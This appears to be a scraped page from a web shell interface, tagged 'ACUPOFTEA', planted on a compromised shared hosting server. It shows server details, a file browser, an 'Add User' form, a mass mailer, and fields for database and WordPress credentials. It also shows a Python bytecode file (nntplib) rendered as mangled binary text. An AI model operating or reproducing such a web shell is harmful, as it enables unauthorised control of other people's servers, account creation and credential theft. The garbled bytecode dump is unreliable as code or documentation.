System
:
Linux server195.web-hosting.com 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Software
:
LiteSpeed
Server
:
198.54.115.201
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
lib64
/
python3.8
/
__pycache__
/
216.73.216.102
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for sunrisetraders.in made by tabagkayu.
Folder Name
File Name
File Content
File
nntplib.cpython-38.opt-1.pyc
U e5d�� � @ s� d Z ddlZddlZddlZddlZddlZddlZzddlZW n ek rX dZ Y nX dZ ddl mZ ddlm Z ddd d ddd dgZdZG dd� de�ZG dd � d e�ZG dd � d e�ZG dd� de�ZG dd� de�ZG dd � d e�ZdZdZddddddddd d!d"d#hZd$d%d&d'd(d)d*gZd)d*d+�Zd,Ze�d-d.d/d0d1g�Ze�d2d3d4d5g�Zd6d� Zd7d8� Z dmd9d:�Z!dnd;d<�Z"dod=d>�Z#e �r�d?d@� Z$G dAdB� dB�Z%G dCd� de%�Z&e �r�G dDdE� dEe%�Z'e�(dE� e)dFk�r�ddl*Z*e*j+dGdH�Z,e,j-dIdJdKdLdM� e,j-dNdOdPdQdM� e,j-dRdSdTe.dUeef dV� e,j-dWdXdYe.dZdV� e,j-d[d\d]dd^d_� e,�/� Z0e0j1Z1e0j�s�e1dTk�r|eZ1e&e0j2e1d`�Z3ne1dTk�r�eZ1e'e0j2e1d`�Z3e3�4� Z5dae5k�r�e3�6� e3�7e0j7�\Z8Z9Z:Z;Z<e=dbe<dce9dde:dee;� dfdg� Z>e?e.e;�e0j@ dh �Z:e3�Ae:e;�\Z8ZBeBD ]Z\ZCZDeeDd% ��Edidh�d ZFeeDd$ �ZGe.eDd* �ZHe=dj�IeCe>eFdk�e>eGdl�eH�� �q e3�J� dS )pa� An NNTP client class based on: - RFC 977: Network News Transfer Protocol - RFC 2980: Common NNTP Extensions - RFC 3977: Network News Transfer Protocol (version 2) Example: >>> from nntplib import NNTP >>> s = NNTP('news') >>> resp, count, first, last, name = s.group('comp.lang.python') >>> print('Group', name, 'has', count, 'articles, range', first, 'to', last) Group comp.lang.python has 51 articles, range 5770 to 5821 >>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last)) >>> resp = s.quit() >>> Here 'resp' is the server response line. Error responses are turned into exceptions. To post an article from a file: >>> f = open(filename, 'rb') # file containing article, including header >>> resp = s.post(f) >>> For descriptions of all methods, read the comments in the code below. Note that all arguments and return values representing article numbers are strings, not numbers, since they are rarely used for calculations. � NFT)� decode_header)�_GLOBAL_DEFAULT_TIMEOUT�NNTP� NNTPError�NNTPReplyError�NNTPTemporaryError�NNTPPermanentError�NNTPProtocolError� NNTPDataErrorr i c @ s e Zd ZdZdd� ZdS )r z%Base class for all nntplib exceptionsc G s>